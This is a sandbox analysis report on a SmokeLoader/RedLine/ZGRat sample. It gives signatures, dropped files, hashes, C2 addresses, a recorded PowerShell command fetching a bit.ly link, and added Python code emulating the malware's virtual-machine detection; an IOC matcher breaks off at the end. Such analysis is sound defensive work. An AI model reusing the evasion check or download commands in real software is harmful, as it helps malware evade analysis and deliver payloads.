Analysis Overview
SHA256
bf4e0ba12be5590ba80c2d595c166a8c2d36d6baf2770c8d1da20e64ea898367
Threat Level: Known bad
The file b67151e07936533f3b38355566e47650.exe was found to be: Known bad.
Malicious Activity Summary
RedLine
ZGRat
Smokeloader family
SmokeLoader
RedLine payload
Detect ZGRat V1
Downloads MZ/PE file
Reads user/profile data of web browsers
Deletes itself
Executes dropped EXE
Looks up external IP address via web service
Legitimate hosting services abused for malware hosting/C2
Accesses cryptocurrency files/wallets, possible credential harvesting
Unsigned PE
Suspicious use of AdjustPrivilegeToken
Uses Task Scheduler COM API
Suspicious use of WriteProcessMemory
Checks SCSI registry key(s)
Suspicious behavior: MapViewOfSection
Suspicious behavior: EnumeratesProcesses
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2023-12-18 21:46
Signatures
Smokeloader family
Unsigned PE
Analysis: behavioral1
Detonation Overview
Submitted
2023-12-18 21:46
Reported
2023-12-18 21:48
Platform
win7-20231215-en
Max time kernel
27s
Max time network
62s
Command Line
Signatures
RedLine
RedLine payload
SmokeLoader
Downloads MZ/PE file
Deletes itself
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\5EB3.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\72D0.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | api.ipify.org | N/A | N/A |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\b67151e07936533f3b38355566e47650.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\b67151e07936533f3b38355566e47650.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\b67151e07936533f3b38355566e47650.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\b67151e07936533f3b38355566e47650.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\b67151e07936533f3b38355566e47650.exe | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\b67151e07936533f3b38355566e47650.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1232 wrote to memory of 2708 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\5EB3.exe |
| PID 1232 wrote to memory of 2708 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\5EB3.exe |
| PID 1232 wrote to memory of 2708 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\5EB3.exe |
| PID 1232 wrote to memory of 2708 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\5EB3.exe |
| PID 1232 wrote to memory of 2872 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\72D0.exe |
| PID 1232 wrote to memory of 2872 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\72D0.exe |
| PID 1232 wrote to memory of 2872 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\72D0.exe |
| PID 1232 wrote to memory of 2872 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\72D0.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\b67151e07936533f3b38355566e47650.exe
"C:\Users\Admin\AppData\Local\Temp\b67151e07936533f3b38355566e47650.exe"
C:\Users\Admin\AppData\Local\Temp\5EB3.exe
C:\Users\Admin\AppData\Local\Temp\5EB3.exe
C:\Users\Admin\AppData\Local\Temp\72D0.exe
C:\Users\Admin\AppData\Local\Temp\72D0.exe
C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe
"C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe"
C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"
C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"
C:\Users\Admin\AppData\Local\Temp\is-6T1TS.tmp\tuc3.tmp
"C:\Users\Admin\AppData\Local\Temp\is-6T1TS.tmp\tuc3.tmp" /SL5="$9011C,7276951,68608,C:\Users\Admin\AppData\Local\Temp\tuc3.exe"
C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"
C:\Users\Admin\AppData\Local\Temp\tuc3.exe
"C:\Users\Admin\AppData\Local\Temp\tuc3.exe"
C:\Windows\system32\makecab.exe
"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20231218214635.log C:\Windows\Logs\CBS\CbsPersist_20231218214635.cab
Network
| Country | Destination | Domain | Proto |
| RU | 185.215.113.68:80 | 185.215.113.68 | tcp |
| US | 8.8.8.8:53 | bitbucket.org | udp |
| US | 104.192.141.1:443 | bitbucket.org | tcp |
| US | 104.192.141.1:443 | bitbucket.org | tcp |
| RU | 5.42.65.125:80 | 5.42.65.125 | tcp |
| RU | 77.105.132.87:17066 | | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| DE | 140.82.121.3:443 | github.com | tcp |
| DE | 140.82.121.3:443 | github.com | tcp |
| US | 8.8.8.8:53 | api.ipify.org | udp |
| US | 104.237.62.212:80 | api.ipify.org | tcp |
| BG | 91.92.254.7:80 | 91.92.254.7 | tcp |
Files
memory/2144-0-0x0000000000400000-0x000000000040A000-memory.dmp
memory/2144-2-0x0000000000400000-0x000000000040A000-memory.dmp
memory/1232-1-0x0000000002D50000-0x0000000002D66000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\5EB3.exe
| MD5 | 9a747219c8fab73e2ba0541e3d86cd8b |
| SHA1 | 0723a7c85108ebd6a8141a7ce2459c35add81a0c |
| SHA256 | eb33681098da51a889200090735de67ff170fbb4adb5b01284f08821134f5f01 |
| SHA512 | acb9faf833107d7a0ff16692861b03e3c719ef60851335082e75b16a53ee073ce53418e1aa57ca8c164ebb695ffc44638bfaeb533a79e15e1d480cee34b65a83 |
memory/2708-14-0x00000000002A0000-0x00000000002F2000-memory.dmp
memory/2708-19-0x00000000743B0000-0x0000000074A9E000-memory.dmp
memory/2708-20-0x0000000000D10000-0x0000000000D50000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\72D0.exe
| MD5 | 0cae0a0d054f11618d1ad67eb399f6ae |
| SHA1 | a094cb5ea7cba55f81a790fcda064cccd44e975b |
| SHA256 | f5f488eabcc59ddf49cae07715ea4eea2a1d480f227175e4ba4de3bf09ebb205 |
| SHA512 | 8191eed7841083837f180ff86076f29b79579b5433b06265678fffbdb4346cb301ac3e867a59c6c12bdc95d15a24c7d3e0a70285e6ea10fc4785b8009cc9f389 |
C:\Users\Admin\AppData\Local\Temp\72D0.exe
| MD5 | 636799f190571f763112612141cf8225 |
| SHA1 | bb06d7fa20c75a2fc6ca21bb8a080d5d9ae5ef91 |
| SHA256 | 4efe31676c00f7fa0c39b1785eb1b1091ab8200d4522d4cf37f87e8398b909ee |
| SHA512 | c1b2f120afa8bc315f22843f9e9e2383548cd59fe4c2320fa6a7c4f7a768482e1200d7ef213f8dab09662dc4a66a4882438e0a9b54589587107ae07c4d9fafdf |
memory/2872-27-0x00000000743B0000-0x0000000074A9E000-memory.dmp
memory/2872-28-0x0000000000A90000-0x0000000001882000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe
| MD5 | 889f316cc81ed54952528f3980ed0334 |
| SHA1 | f7479b182f9ae17141dc92f1f3650a1c495849b6 |
| SHA256 | eb2f26e0f7259a52df38c30d46b700c497498a55422fd0aafd7dc06e8ec321cb |
| SHA512 | d93cfd7214bdd651af757343fc6b9fd042a3a59fcb9841d7382efa29b1ce7838fa2a789719dade95283cc6429a22e51bac2b97c9bf33417333b4ac9b08d75097 |
\Users\Admin\AppData\Local\Temp\InstallSetup9.exe
| MD5 | c97d74d9e49a75e8d165e18ae1d34377 |
| SHA1 | e6f0c01abf7c3f1efdd0d54055396657f376d80b |
| SHA256 | da0c66fa7319d07eba575212fa203019729ba7ec81a448ac772425e6813251a8 |
| SHA512 | a05dcbed03051c21ad2b3ba2415782d4fd15bc481427fc0dce863a3471c573c598b1b035035d28ba0164b7e8860574176c85169c830fbdd689b1ba8f174b3ebc |
C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
| MD5 | 62b01ec4a955eab3a7a41e2c07f18913 |
| SHA1 | 48d8e1e391fa078d78e2130481f9d35eb45a11ec |
| SHA256 | c76de2cd7f512fb4ccef14734eb63daa46c05c7e372e886381652e97dee9af56 |
| SHA512 | 725dcf11ab6140f249e570960864011d12687ce177988ae9ec378a67062509c52a343a4db80cfdb9de03200eaf66569016590c1091cbda74ca795cf24f60fb56 |
C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe
| MD5 | 53604cef6dd756ae33440b38e66abee6 |
| SHA1 | c3cf1ba4e89cf136289c645109a55aa6e95a5621 |
| SHA256 | 02161a1d6ee0814f514184f5436e0b0e62e5d8c8cfbbe17c64c10689a85c42ad |
| SHA512 | 25282a06656aa3219479c499b94b79feaaf5af5c63b60bd773665d40d43b43e583680aa95e864aeeca358ca6be2e20ebbbeb3d3a3f9d5c8b57e8dd83ae787f48 |
\Users\Admin\AppData\Local\Temp\nsj7428.tmp\Math.dll
| MD5 | ebd8a7a5042ae1d4ce1aa9071859c851 |
| SHA1 | ee508ce7cbe8b1b0bd471bee43e1ec19d21e8ad6 |
| SHA256 | fb6a0072377325b5da0d1da236d9da2610608e9ab74318e15540cc7aca75f837 |
| SHA512 | daebecc30e91b19737b346ed7ac85ada87757f53fa67fdd262ba617b29c24ebde4058171f71bf1bc8d0d8b39a9a346c7ef2a9968908dbc16723069d8f9507b0e |
\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
| MD5 | 06af250521d0acb84fa6b454dd3aa63f |
| SHA1 | b2326d895ae2893812f733c2c053a58bce4862a3 |
| SHA256 | bf6c43f30fb94de9d2d8a9b934f44a84fc7417f26c2ed7eaf18295ab3f8277c8 |
| SHA512 | 70edbf18c92f5bb4697968bb6c7172743de35aa03dfae1f758320540fb2e614e8359fca685ec491ddc99b07bf0e860e4649f150d7de7ea80da062e9f9e235370 |
C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
| MD5 | 96dfd842fc4b217272642561a2a335cd |
| SHA1 | fa92b3acb145c4881d161b31ea17d39e3096061c |
| SHA256 | b129a832b0e3bfb214081218c9f5be9e31165f31cd0861cb3d8117a59be40638 |
| SHA512 | c719222c4e91d7b8dbf104ae1e15aab95d32736347e3a21811d4786875c84f4db2d98ab373bf429cd5fa517650f03375a80c5582e95fb9d20c150da6a7a2b298 |
memory/2736-61-0x0000000002690000-0x0000000002A88000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
| MD5 | e33bba019d201b53c0f1c841b95ab085 |
| SHA1 | 962622858a20099b64b1fc7270688037175f6210 |
| SHA256 | 7a2b624432901140afa0ed9b8278f6cca9c128590648deb78ef4dbf139cc2e5a |
| SHA512 | b0b288418c52607c588eb04ff04d1cbdc63a4ab582e33000f90324a315dc9363aee9bc866cb0d795734a9d23bb03d56674255db864ffc90053d5b53af40ba0bd |
\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
| MD5 | b667ff1da7f629bd935c8407579a52f4 |
| SHA1 | cee70ebefa24ea5b50b972150072cab5db289193 |
| SHA256 | 4dfac721e92de3b8f617e71fb3aa251c9ae4361cc50afb236209cb09d46f8be6 |
| SHA512 | 8f3224cc671f3067454d22f8016e278824422b8cfea941d23cbcff0c36ce58fb8845f4a45de283ae38ec72c703fe3e90ecbfcd97d76aa74c24cff976c47cdb95 |
\Users\Admin\AppData\Local\Temp\tuc3.exe
| MD5 | 78fa75e60321eacdd9f62e5fd8a85bd8 |
| SHA1 | 14e32b8fe16636ea249b84cde2f48e6d6ac061e3 |
| SHA256 | 88fe5388b1ee99b474293262535063f3e11dff8068e20ebfff3b5eaf3efdb1d7 |
| SHA512 | 8893755937ca6bcbe03b589de6743e7bdfa813f92ce6254ccd2f8b2531df543557b8fd690245d8af5e8c11f79435e1b330ad2a657336e5edbc918bdf3a810863 |
C:\Users\Admin\AppData\Local\Temp\tuc3.exe
| MD5 | be3d7299879e5e5371b982768403214c |
| SHA1 | a1375c79c51280edd30f37389b0b93d973069ee4 |
| SHA256 | 91c015f6c836d5f47f0fdc67cf38aca7f96f7f9ca14b1a33be20d73f8f25f874 |
| SHA512 | 325cbdf243a65999e434df5bcdc9b76a3b2b15766f6ebab550608d6a4205802b6e3200bbab2da5cc5e4b7a376ca4e72aa3cba408de5bf1b1f75f2b21077e51e2 |
memory/2944-72-0x000000007EFDE000-0x000000007EFDF000-memory.dmp
memory/2672-73-0x0000000000220000-0x0000000000229000-memory.dmp
memory/2736-76-0x0000000002A90000-0x000000000337B000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\tuc3.exe
| MD5 | 09a78f0f02a8c8dbc91b2be03742f82b |
| SHA1 | c02e782c481eeda8d19687afc165bad0eb26e8cc |
| SHA256 | 26ef9ace8c6489bad88664897a76a958d49e46f1d0bc93e4acdbbf09fc415674 |
| SHA512 | 1a3a2f88d5f6315a13fb86d18afaead04e0f121e23ee165e1bb229a75c547a4856b02ef38ae7324c6a6e4ab117aa56662284fdc878b6f85350be018a8844a776 |
memory/2736-87-0x0000000000400000-0x0000000000D1C000-memory.dmp
memory/2944-88-0x0000000000400000-0x0000000000409000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\is-6T1TS.tmp\tuc3.tmp
| MD5 | f448d7f4b76e5c9c3a4eaff16a8b9b73 |
| SHA1 | 31808f1ffa84c954376975b7cdb0007e6b762488 |
| SHA256 | 7233b85eb0f8b3aa5cae3811d727aa8742fec4d1091c120a0fe15006f424cc49 |
| SHA512 | f8197458cd2764c0b852dac34f9bf361110a7dc86903024a97c7bcd3f77b148342bf45e3c2b60f6af8198ae3b83938dbaad5e007d71a0f88006f3a0618cf36f4 |
\Users\Admin\AppData\Local\Temp\is-AN06R.tmp\_isetup\_shfoldr.dll
| MD5 | 92dc6ef532fbb4a5c3201469a5b5eb63 |
| SHA1 | 3e89ff837147c16b4e41c30d6c796374e0b8e62c |
| SHA256 | 9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87 |
| SHA512 | 9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3 |
\Users\Admin\AppData\Local\Temp\is-AN06R.tmp\_isetup\_iscrypt.dll
| MD5 | a69559718ab506675e907fe49deb71e9 |
| SHA1 | bc8f404ffdb1960b50c12ff9413c893b56f2e36f |
| SHA256 | 2f6294f9aa09f59a574b5dcd33be54e16b39377984f3d5658cda44950fa0f8fc |
| SHA512 | e52e0aa7fe3f79e36330c455d944653d449ba05b2f9abee0914a0910c3452cfa679a40441f9ac696b3ccf9445cbb85095747e86153402fc362bb30ac08249a63 |
memory/2128-113-0x0000000000240000-0x0000000000241000-memory.dmp
\Users\Admin\AppData\Local\Temp\is-AN06R.tmp\_isetup\_isdecmp.dll
| MD5 | 3adaa386b671c2df3bae5b39dc093008 |
| SHA1 | 067cf95fbdb922d81db58432c46930f86d23dded |
| SHA256 | 71cd2f5bc6e13b8349a7c98697c6d2e3fcdeea92699cedd591875bea869fae38 |
| SHA512 | bbe4187758d1a69f75a8cca6b3184e0c20cf8701b16531b55ed4987497934b3c9ef66ecd5e6b83c7357f69734f1c8301b9f82f0a024bb693b732a2d5760fd303 |
memory/2336-99-0x0000000000240000-0x0000000000241000-memory.dmp
\Users\Admin\AppData\Local\Temp\nsj7428.tmp\INetC.dll
| MD5 | 40d7eca32b2f4d29db98715dd45bfac5 |
| SHA1 | 124df3f617f562e46095776454e1c0c7bb791cc7 |
| SHA256 | 85e03805f90f72257dd41bfdaa186237218bbb0ec410ad3b6576a88ea11dccb9 |
| SHA512 | 5fd4f516ce23fb7e705e150d5c1c93fc7133694ba495fb73101674a528883a013a34ab258083aa7ce6072973b067a605158316a4c9159c1b4d765761f91c513d |
C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
| MD5 | 4291815e0de7498614bcf21ca722551a |
| SHA1 | a2b63bba1e986b405bafc8c164056467d80ea919 |
| SHA256 | d60518795a083c0a841f4ddfe6cc4212d17a0d1a84267b576ea1fb7245f86dd7 |
| SHA512 | 4c0fad37f9ccb76fc03dfa4267864cbd3c6ced7b3e092984ef2e4f8c36cb4845f76e328e67a89934cf2605aa51509b176b36f387a0e32c3767deb4b980dc1766 |
\Users\Admin\AppData\Local\Temp\BroomSetup.exe
| MD5 | afbe2cfdbbb1f4659c3edad94e9118e7 |
| SHA1 | ae53369f974ae091f0b0cf717ffac022be25a173 |
| SHA256 | 64f492ce2a41599af7f31ff186f0fb09b574a049acabfb3b06bb6fa84addcb39 |
| SHA512 | 1ccb302c26b950490b35ad5781c2cd4bac9335a9b8ad305e022dff330a720579421c8344a825a037a0af1e55236fe5f5a6721bb7b7fd142bbdc78e71c040cda1 |
memory/2944-80-0x0000000000400000-0x0000000000409000-memory.dmp
memory/2736-77-0x0000000002690000-0x0000000002A88000-memory.dmp
memory/2872-74-0x00000000743B0000-0x0000000074A9E000-memory.dmp
memory/2860-71-0x0000000000400000-0x0000000000418000-memory.dmp
memory/2672-70-0x0000000000970000-0x0000000000A70000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
| MD5 | 67f5e9888d53bd6520c2a5ec6ac50aed |
| SHA1 | 053cee76df8f08bbb9df3fcca13267fa087eba5f |
| SHA256 | c7d88978391a30d55da04d925ed25df35ed798c358669473f988406aada23dc5 |
| SHA512 | 556b7d383ee93d89a5bc828848af045889ce255f325029af728181254c27f635a14589c61840b52f8b1a4cfa04bd04267bff5677dc4ec8a6847efc3d5d577509 |
Analysis: behavioral2
Detonation Overview
Submitted
2023-12-18 21:46
Reported
2023-12-18 21:48
Platform
win10v2004-20231215-en
Max time kernel
38s
Max time network
105s
Command Line
Signatures
Detect ZGRat V1
RedLine
RedLine payload
SmokeLoader
ZGRat
Downloads MZ/PE file
Deletes itself
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\9CFB.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\C7C5.exe | N/A |
Reads user/profile data of web browsers
Accesses cryptocurrency files/wallets, possible credential harvesting
Legitimate hosting services abused for malware hosting/C2
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | api.ipify.org | N/A | N/A |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\b67151e07936533f3b38355566e47650.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\b67151e07936533f3b38355566e47650.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\b67151e07936533f3b38355566e47650.exe | N/A |
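Both detonations record the parent sample opening, querying and enumerating \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI before anything is dropped. Subkey names under that key embed the storage vendor and product strings, so a loader can read them to decide whether it is running inside a virtual machine and stay dormant if it is. The block below is an added example, not code from the report or from the sample: it reproduces that check in Python so a sandbox operator can see what the malware sees on the analysis VM. The vendor marker list and the two sets of sample subkey names are constructed assumptions; only the key path and the open/query/enumerate sequence come from the report.

```python
"""
Added example: emulate the sandbox-evasion check behind the report's
"Checks SCSI registry key(s)" signature.  The key path is the one the
sample touched; the marker list and sample data are assumptions.
"""

# Assumed virtual-machine markers; a real loader's list may differ.
VM_MARKERS = ("vmware", "vbox", "virtualbox", "qemu", "xen", "virtual")

# Constructed sample data: subkey names as they appear under Enum\SCSI
# on a VMware guest and on a bare-metal host.
SAMPLE_VM_HOST = [
    r"Disk&Ven_VMware&Prod_Virtual_disk",
    r"CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD1",
]
SAMPLE_PHYSICAL_HOST = [
    r"Disk&Ven_&Prod_Samsung_SSD_980",
    r"CdRom&Ven_HL-DT-ST&Prod_DVDRAM_GH24NSD1",
]


def scsi_vm_indicators(subkeys):
    """Return (subkey, marker) pairs that a loader would treat as VM evidence."""
    hits = []
    for name in subkeys:
        lowered = name.lower()
        for marker in VM_MARKERS:
            if marker in lowered:
                hits.append((name, marker))
                break  # one marker per subkey is enough
    return hits


def looks_like_vm(subkeys):
    """True when at least one SCSI device name leaks a VM vendor string."""
    return bool(scsi_vm_indicators(subkeys))


def enumerate_scsi_subkeys():
    """On Windows, read the live key the sample enumerated; elsewhere return None."""
    try:
        import winreg
    except ImportError:
        return None
    path = r"SYSTEM\ControlSet001\Enum\SCSI"
    names = []
    with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, path) as key:
        count = winreg.QueryInfoKey(key)[0]
        for index in range(count):
            names.append(winreg.EnumKey(key, index))
    return names


if __name__ == "__main__":
    live = enumerate_scsi_subkeys()
    data = live if live is not None else SAMPLE_VM_HOST
    print("VM indicators:", scsi_vm_indicators(data))
```

Run it on the analysis guest to learn which device names give the sandbox away; renaming the virtual disk and CD-ROM identifiers is the usual fix. Note that Sysmon registry events (IDs 12, 13 and 14) cover key creation, value writes and renames only, so this read-only enumeration does not appear in Sysmon telemetry; it is visible through kernel registry ETW or an EDR that hooks registry reads.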
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\b67151e07936533f3b38355566e47650.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\b67151e07936533f3b38355566e47650.exe | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\b67151e07936533f3b38355566e47650.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\9CFB.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3440 wrote to memory of 2492 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\9CFB.exe |
| PID 3440 wrote to memory of 2492 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\9CFB.exe |
| PID 3440 wrote to memory of 2492 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\9CFB.exe |
| PID 3440 wrote to memory of 5092 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\C7C5.exe |
| PID 3440 wrote to memory of 5092 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\C7C5.exe |
| PID 3440 wrote to memory of 5092 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\C7C5.exe |
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\b67151e07936533f3b38355566e47650.exe
"C:\Users\Admin\AppData\Local\Temp\b67151e07936533f3b38355566e47650.exe"
C:\Users\Admin\AppData\Local\Temp\9CFB.exe
C:\Users\Admin\AppData\Local\Temp\9CFB.exe
C:\Users\Admin\AppData\Local\Temp\C7C5.exe
C:\Users\Admin\AppData\Local\Temp\C7C5.exe
C:\Users\Admin\AppData\Local\Temp\D469.exe
C:\Users\Admin\AppData\Local\Temp\D469.exe
C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe
"C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe"
C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"
C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
C:\Users\Admin\AppData\Local\Temp\tuc3.exe
"C:\Users\Admin\AppData\Local\Temp\tuc3.exe"
C:\Users\Admin\AppData\Local\Temp\D91D.exe
C:\Users\Admin\AppData\Local\Temp\D91D.exe
C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c install.bat
C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"
C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"
C:\Users\Admin\AppData\Local\Temp\is-KBMR3.tmp\tuc3.tmp
"C:\Users\Admin\AppData\Local\Temp\is-KBMR3.tmp\tuc3.tmp" /SL5="$1C0022,7276951,68608,C:\Users\Admin\AppData\Local\Temp\tuc3.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Invoke-WebRequest -Uri 'https://bit.ly/3RmFzgo'"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 0.181.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 181.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.200:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 241.154.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| RU | 185.215.113.68:80 | 185.215.113.68 | tcp |
| US | 8.8.8.8:53 | 68.113.215.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | bitbucket.org | udp |
| US | 104.192.141.1:443 | bitbucket.org | tcp |
| US | 8.8.8.8:53 | bbuseruploads.s3.amazonaws.com | udp |
| US | 54.231.196.25:443 | bbuseruploads.s3.amazonaws.com | tcp |
| US | 8.8.8.8:53 | 1.141.192.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.196.231.54.in-addr.arpa | udp |
| RU | 77.105.132.87:17066 | | tcp |
| US | 8.8.8.8:53 | 87.132.105.77.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| RU | 5.42.65.125:80 | 5.42.65.125 | tcp |
| GB | 88.221.134.18:80 | | tcp |
| US | 8.8.8.8:53 | 125.65.42.5.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.134.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| DE | 140.82.121.4:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 4.121.82.140.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 81.171.91.138.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.ipify.org | udp |
| US | 173.231.16.77:80 | api.ipify.org | tcp |
| US | 8.8.8.8:53 | 77.16.231.173.in-addr.arpa | udp |
| BG | 91.92.254.7:80 | 91.92.254.7 | tcp |
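The Network tables of both detonations mix two kinds of destination: raw-IP endpoints contacted over plain HTTP or an odd high port (185.215.113.68, 5.42.65.125, 77.105.132.87:17066, 91.92.254.7), and shared services the loader abuses for payload hosting and external-IP discovery (bitbucket.org and its S3 bucket, github.com and objects.githubusercontent.com, api.ipify.org). The first group can go straight into a block list; the second cannot, because blocking GitHub or Bitbucket breaks legitimate traffic. The block below is an added example, not code from the report: it turns those rows into a matcher and runs it over constructed Sysmon-style events (ID 3 network connections, ID 22 DNS queries). The event records, the process images on them, and the rule that a lookup of an abused service is only interesting when the querying process lives under AppData\Local\Temp are assumptions made here; the endpoint and domain lists are taken from the report.

```python
"""
Added example: IOC matcher built from the report's Network tables,
exercised on constructed Sysmon-style events.
"""
from dataclasses import dataclass

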